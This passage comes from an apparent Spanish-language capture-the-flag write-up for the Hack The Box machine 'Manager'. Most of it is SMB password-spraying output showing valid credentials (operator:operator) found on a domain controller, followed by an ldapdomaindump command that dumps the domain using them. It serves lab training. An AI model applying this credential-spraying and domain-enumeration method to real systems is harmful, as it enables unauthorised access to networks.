SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\OPERATOR:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Operator:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\operator:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\OPERATOR:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Operator:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\operator:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\OPERATOR:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Operator:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\operator:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\OPERATOR:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Operator:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\operator:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\OPERATOR:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Operator:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\operator:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\OPERATOR:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Operator:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\operator:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\OPERATOR:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [+] manager.htb\Operator:operator 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [+] manager.htb\operator:operator 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [+] manager.htb\OPERATOR:operator 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:OPERATOR STATUS_LOGON_FAILURE 

LDAP Enumeration

Como tenemos unas credenciales válidas, voy a usar ldapdomaindump para dumpear toda la información posible del dominio

# ldapdomaindump 10.129.165.27 -u 'manager.htb\operator' -p 'operator' --no-json --no-grep
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

Nos montamos un servidor http con python en la misma ruta

# python -m http.server 80        

Accedemos a http://localhost/

